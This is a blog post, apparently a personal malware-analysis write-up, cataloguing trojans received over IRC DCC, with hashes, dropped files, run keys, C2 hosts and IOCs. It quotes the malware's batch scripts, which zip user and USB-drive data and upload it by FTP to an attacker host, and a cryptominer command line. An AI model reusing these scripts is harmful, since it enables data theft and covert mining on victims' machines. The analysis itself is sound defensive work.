Trojans transferred via IRC | Joachim De Zutter
Malware #1: Credentials stealer
IRC DCC Send From 216.249.71.66 (20/09/2010)
CTCP VERSION mIRC v6.35 Khaled Mardam-Bey
Filename: DCS0039.SCR zipped in DCS0039.ZIP
Filesize: 762509
MD5: 4977cc3ab9a7168332e65de67fd73b86
SHA1: c8fcebc53848a71a2088e1ec06aab557c6a7669f
SHA256: 8a641f680bd6300686bb29d2b100745912e26905cac6cd65cfe0ba76e7231c41
Undetected by AVG, appears to be programmed in .NET C#

When the .NET framework is not installed the binary gives the error message:
"Application failed to initialize properly (0xc00000135)."

The malware creates the following files:

Filename: %WINDIR%/Temp/mspass.exe
Filesize: 372301
MD5: 25c1640e67bd102784b4a9928fd93db2

Filename: %WINDIR%/Temp/WinAV.exe
Filesize: 762509
MD5: 4977cc3ab9a7168332e65de67fd73b86

Filename: %WINDIR%/Temp/Chromepass.exe
Filesize: 435277
MD5: 4dd8c672a575629e48b0b50149951850

Filename: %WINDIR%/Temp/FF.exe
Filesize: 33792
MD5: 81fc5a1836cc2af4dc7bdf8bd191844b

Filename: %WINDIR%/Temp/iepv.exe
Filesize: 350797
MD5: 97f938d35698fe9cd5b84b257ed4d7df

Filename: %WINDIR%/Temp/tmpinfo.txt
Filesize: around 6068 bytes

Filename: %WINDIR%/Temp/CD KEYS.txt
Filesize: 4499
MD5: 1607689572e89258ef72c1cbf155b55a

Filename: %WINDIR%/Temp/Chrome.txt
Filesize: 2

Filename: %WINDIR%/Temp/Firepass.txt
Filesize: 0

Filename: %WINDIR%/Temp/IE.txt
Filesize: 0

Filename: %WINDIR%/Temp/mess.txt
Filesize: 0

The windows program %WINDIR%\SYSTEM32\systeminfo.exe is executed to collect information about the victim.
The malware sends a mail via smtp.gmail.com using TLS encryption on TCP port 587.
For this, the schannel security package (schannel.dll) is loaded which creates SSL client credentials.
According to the schannel event log:
An SSL client handshake completed successfully. The negotiated 
cryptographic parameters are as follows. 

Protocol: TLS (SSL 3.1)
Cipher: RC4
Cipher strength: 128
MAC: MD5
Exchange: RSA
Exchange strength: 1024
SECUR32!EncryptMessage is used to encrypt the TLS traffic which contains the Base64 encoded mail address of the attacker (owned78347762@gmail.com):

AUTH login b3duZWQ3ODM0Nzc2MkBnbWFpbC5jb20=

The malware performs a GET request for /automation/n09230945.asp on www.whatismyip.com
A startup key is created:
"HKLM/SOFTWARE/Microsoft/Windows/CurrentVersion/Run/Windows Update" = "C:\Windows\temp\WinAV.exe"

http://www.utrace.de/?query=216.249.71.66
Provider: Smithville Digital, LLC
Organisation: Smithville Telephone Company DSL
Region: Bloomington (US)


Malware #2
IRC DCC Send From 216.249.92.71 (27/06/2011)
CTCP VERSION mIRC v7.19 Khaled Mardam-Bey
Filename: DCS0029.SCR zipped in DCS0029.ZIP
Filesize: 163840
MD5: ed9318fc2a606a922b807f2f25fc4a93
SHA1: c92e7913a7789d5235a033f64a5c2730ad2d0acb
SHA256: 75f1c536c6fa1558c7fe641ba1c9a0ec20c13a15d2993614dd9361a26786e2b2

Malware #3
IRC DCC Send From 216.249.92.71 (27/06/2011)
CTCP VERSION mIRC v7.19 Khaled Mardam-Bey
Filename: DCS0029.SCR zipped in DCS0029.ZIP
Filesize: 114688
MD5: 40145c9c4dffc99c409191b363db3463
SHA1: 70e7ee04625b6770501bd6f90fc906f29dfd0ff2
SHA256: 150ab624e61da6e886170cc0f3c7d730e7740dac4d1d00bd6e4a931bb3977eef

Malware #4
IRC DCC Send From 216.249.92.71 (27/06/2011)
CTCP VERSION mIRC v7.19 Khaled Mardam-Bey
Filename: DSC0029.SCR zipped in DCS0029.ZIP
Filesize: 442368
MD5: 125db832916711c81cdb6209724b912f
SHA1: cff02e859c5704864265877e1969a92d5931847e
SHA256: d9a3ccdb977d70dfca1c6f3ca6737e21f667cb4f6a0273ea02b6a137cf9b5996

A DNS lookup was performed for gamersplus.zapto.org which resolved to 216.249.92.71
A TCP connection was established with port 1960 on 216.249.92.71

Malware #5
IRC DCC Send From 216.249.92.71 (27/06/2011)
CTCP VERSION mIRC v7.19 Khaled Mardam-Bey
Filename: DCS0029.SCR zipped in DCS0029.ZIP
Filesize: 413184
MD5: 74e3f8206bcd8ec52275594e9b0c3a03
SHA1: b87219bcf19f60374b9f8dbde334918336b346d7
SHA256: 52e16e44bff3d8cef2474359990994c77a3640587dbba21d9d4367a247253b33

Malware #6
IRC DCC Send From 216.249.92.71 (06/01/2012)
CTCP VERSION mIRC v7.19 Khaled Mardam-Bey
Filename: DCS0029.SCR zipped in DCS0029.ZIP
Filesize: 648192
MD5: 5f0365ab01c02b095f89a3d1f73601d2
SHA1: 574d880e02e2b78d8459df91797352f98b5e3ad5
SHA256: f903d673908f386d588a456883c1722ceba3a03824430877c370e1996d395e4b

Creates and displays an image.
Filename: DCS0029.jpg
Filesize: 443069
MD5: 58a7c46a0d56c12efdafc92e0e3bcf3f
SHA1: 94ce79d8b1bd5ef39597d8ad6a87db1e19ada091
SHA256: 55ce1fd1b55666a14e250ffb923449556c17752b7a403ef691dd5bbf872a9ac8

Files 7z.exe and 7z.dll were created.
A file Personal.bat with a filesize of 37195 bytes was created under the directory "Local Settings\Temp\1.tmp\" in the current user's home directory containing the strings "Night Arrow 2.0 USB Forensics" and "by DieP0ser@hotmail.com". It ends with:
echo 123 >> up
echo 123 >> up
echo put %computername%.7z >> up
echo rename %computername%.7z %computername%.%random%.7z >> up
echo quit >> up
ftp -s:up && echo System Pwnt. >> %userprofile%\DieP0ser_Was_Here.txt" goto :ftp
The *.bat file creates a file %COMPUTERNAME%.7z and transfers it with the windows FTP client to gamersplus.zapto.org which resolved to 216.249.92.71. The banner returned by the FTP server was: "220 Serv-U FTP Server v11.1 ready".

The file "DieP0ser_Was_Here.txt" was created by CMD.EXE containing the text "Nigga yo been hacked!"

By logging into the FTP server the following files were found:
BENDIDDY-PC.7z 131938 KB 6/01/2012 14:26:00
BR10PC07.31276.7z 17105 KB 6/01/2012 17:50:00
COMPUTERNAME.7z 7/01/2012 10:00:00
PERSONAL.13455.7z 31 KB 7/01/2012 2:25:00
YOUR-27E1513D96.7z 4532 KB 7/01/2012 10:39:00
YOUR-27E1513D96.19353.7z 5524 KB 7/01/2012 10:08:00

Since the FTP user account the *.bat file on my machine logged in with was granted the privilege to delete files, the *.7z file that might have contained personal information originating from the virtual machine was succesfully deleted on the FTP server.

The FTP server also hosted a file named "Rename.BAT" containing:
rename *.7z *%random%.7z
There was also a file hosted named svchost32.exe
Filesize: 22016
MD5: f8432f39160cd578fe5d1bf0c47f818e
SHA1: 2a007b69a39d2e89f4cc94871244119a32c843c0
SHA256: 9bbde5541910ffed1f58084b3ffa2cdeb251578c1d0fe55352e2583cc568c999

The executable drops a batch file
Filename: C:\Documents and Setings\%USERNAME%\Local Settings\Temp\5.tmp\hook.bat
Filesize: 788
MD5: e9ba440098e05ac3b70f09f405e524ad
SHA1: 8d20c74f59cb358590830edbcd765294a97d0149
SHA256: 5c7e96ff6eb3233c215a7678d17254c7465a1b3496be6056591860ec28b40b95

The batch file performs the following commands:
reg add HKLM\SOFTWARE\Microsoft\Windows\Current\VersionRun /v 
WindowsUpdate /t REG_SZ /d C:\svchost32.exe
:usb
mkdir %appdata%\Smoogle
for %%i in (E F G H I J K L M N O P Q R S T U V W X Y Z) do If exist %%i:\*.* copy /Y %%i:\* %appdata%\smoogle\
if exist %appdata%\smoogle\*.* 7z.exe a -y -t7z %computername%USB%%i.7z 
%appdata%\smoogle\*
if exist %%i:/javaupdatelog.txt goto :loop
echo open gamersplus.zapto.org >> up
attrib +h *.*
echo 123 >> up
echo 123 >> up
echo put %computername%USB%%i.7z >> up
echo rename %computername%USB%%i.7z %computername%USB%%i.%random%.7z >> up
echo quit >> up
ftp -s:up 
echo Pwnt. >> %%i:/javaupdatelog.txt
attrib +r +a +s +h %%i:/javaupdatelog.txt
del %computername%USB%%i.7z
goto :loop

:loop
ping -n 1800 127.0.0.1 >nul 

http://www.utrace.de/?query=216.249.92.71
Provider: Smithville Digital, LLC
Organisation: Smithville Telephone Company DSL
Region: Bloomington (US)


Executable #7
Filename: DCS0029.scr
Filesize: 220160
MD5: 5208a5f69f7257f86e1a0202af546cfc
SHA1: 25ff91c7d62c3e6ba53822183514d69e50efaad0
SHA256: 8e908ee730041ab9ccefa342e01c85a8e58b089d61237d15eba1c73f0ffde8b1
Appears to be packed with UPX. Undetected by any AV at the time of discovery. Sent by 216.249.92.71 (09/02/2012), p0f v2 passive OS fingerprint:

Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222) -> 216.249.92.71:4917 (distance 0, link: ethernet/modem)

The executable secretly creates and executes a *.BAT file under %HOMEPATH%/Local Settings/Temp/*.tmp/ which tries to install a Bitcoin Plus miner under %appdata%/mine/ which uses the CPU of the victim to the benefit of the Bitcoin Plus Miner account with ID 9218856.

Filename: miner.bat
Filesize: 1105
MD5: 253c7eec3d97339352f98fb1821ff5cb
SHA1: 3833a83b1e32c609b8e2d001a0251b46f4c48289
SHA256: 00603874c6aad684ab007319fda61389284b9cb0d73ccc490460aa30e4aa8c60

Executable #8
Filename: DCS0029.scr
Filesize: 548864
MD5: af3c424e933c0b41b8d5f2ea3712513b
SHA1: 5049f7b760b563c3ae298bc4beed6f27e88d40c0
SHA256: ff56bfde8581d8a9cfbcaf3853bf7be4b816568d2d9e24d0a61b70575efa240b
https://www.virustotal.com/file/ff56bfde8581d8a9cfbcaf3853bf7be4b816568d2d9e24d0a61b70575efa240b/analysis/

Creates files svchost.exe and system.exe

DSC0029.scr also secretly creates and executes a *.BAT file under %HOMEPATH%/Local Settings/Temp/*.tmp/ which moves system.exe and svchost.exe to %appdata% and creates a startup key for system.exe under HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run named "Windows Update"

Filename: svchost.exe
Filesize: 914432
MD5: d35beaa5a86bed3b94d99a44c90f1474
SHA1: bf0ac966dfabfc1d261b3b056bd46c134d781d94
SHA256: b160cfcf5cc5dde178c331b09e05ab64c247fd58c3b409c2a1c8b0f8566f9000
https://www.virustotal.com/file/b160cfcf5cc5dde178c331b09e05ab64c247fd58c3b409c2a1c8b0f8566f9000/analysis/

Filename: system.exe
Filesize: 106496
MD5: 7673136bcb1aaef86f19a26d10182ce8
SHA1: 60395567c30225ce5a6cacecbb904949015bfd1f
SHA256: d0e64f44d9d6e8114b0085921e16a192a6e375d7f3a8aaa4e43c8b4d69e5ed75
https://www.virustotal.com/file/d0e64f44d9d6e8114b0085921e16a192a6e375d7f3a8aaa4e43c8b4d69e5ed75/analysis/

system.exe creates and executes a *.BAT file under %HOMEPATH%/Local Settings/Temp/*.tmp/ which contains the following command:

%appdata%\svchost.exe -a 5 -o http://pit.deepbit.net:8332 -u andrewsalestech@hotmail.com_Generat -p 123qwerty

Executable #9
Filename: DCS0029.exe
Filesize: 481280
MD5: 83e70851f684d13e2795c0c103ca6b10
SHA1: ed99b0563b56c28570bcd30d84aabb48206f1096
SHA256: 5926877ace33a137f0060335f0d8ec06d1e836572f15ffe0924645f2fcd65016

Creates the svchost.exe file with MD5 d35beaa5a86bed3b94d99a44c90f1474 (see above) and system.exe.

Filename: system.exe
Filesize: 21504
MD5: a3afd3ef222282727881b2e2ca7e1c5c
SHA1: 847b48fa83d292cc1ef52690383e25e002b27646
SHA256: eb35c1f550e5e2f916a22b43689387b523fa1cbdf8404bb9b3e4ddfd91846b8a
https://www.virustotal.com/file/eb35c1f550e5e2f916a22b43689387b523fa1cbdf8404bb9b3e4ddfd91846b8a/analysis/

system.exe creates and executes a *.BAT file under %HOMEPATH%/Local Settings/Temp/*.tmp/ which contains the following command:

%appdata%\svchost.exe -a 5 -o http://pit.deepbit.net:8332 -u andrewsalestech@hotmail.com_friends -p 123qwerty

The bot sending the trojan executables responds to "diep0ser" (case insensitive) with: "DieP0ser Pwns Meh..", the bot logged in on undernet with the username Cutie420.

File #10
IRC DCC Send From 216.249.71.144 (06/11/2015)
/CTCP ... VERSION
VERSION mIRC v6.34 Khaled Mardam-Bey
/CTCP ... TIME
TIME Fri Nov 06 10:27:12 2015
/CTCP ... FINGER
FINGER Pam (Nononono) Idle 6467 seconds (hands off fucker)
Quit message: i am is who i am but what i am is the question

Filename: DCS0029.zip
Filesize: 861728
MD5: f57a96a7a6df31053498295d2c1f4e9a
SHA1: 5f0c96b2ca0d196a08458e32af4d452cb1463e96
SHA256: 8b2ed4a3fa613cb6ede27690c701cbcc79bd0ffbdb5783dbff0bf8eb85c653e9

DCS0029.zip contains DCS0029.scr

Filename: DCS0029.scr
Filesize: 974336
MD5: 5bc25a0556948df7f5e3268a1749a4d6
SHA1: 04803387cee4556a79c0da5262d69640ebf41556
SHA256: b50d2cf7bb1ea9cd39590f0d591658e0af53a95ed3f9cd517901d1d44427446e

a9cd39590f0d591658e0af53a95ed3f9cd517901d1d44427446e/analysis/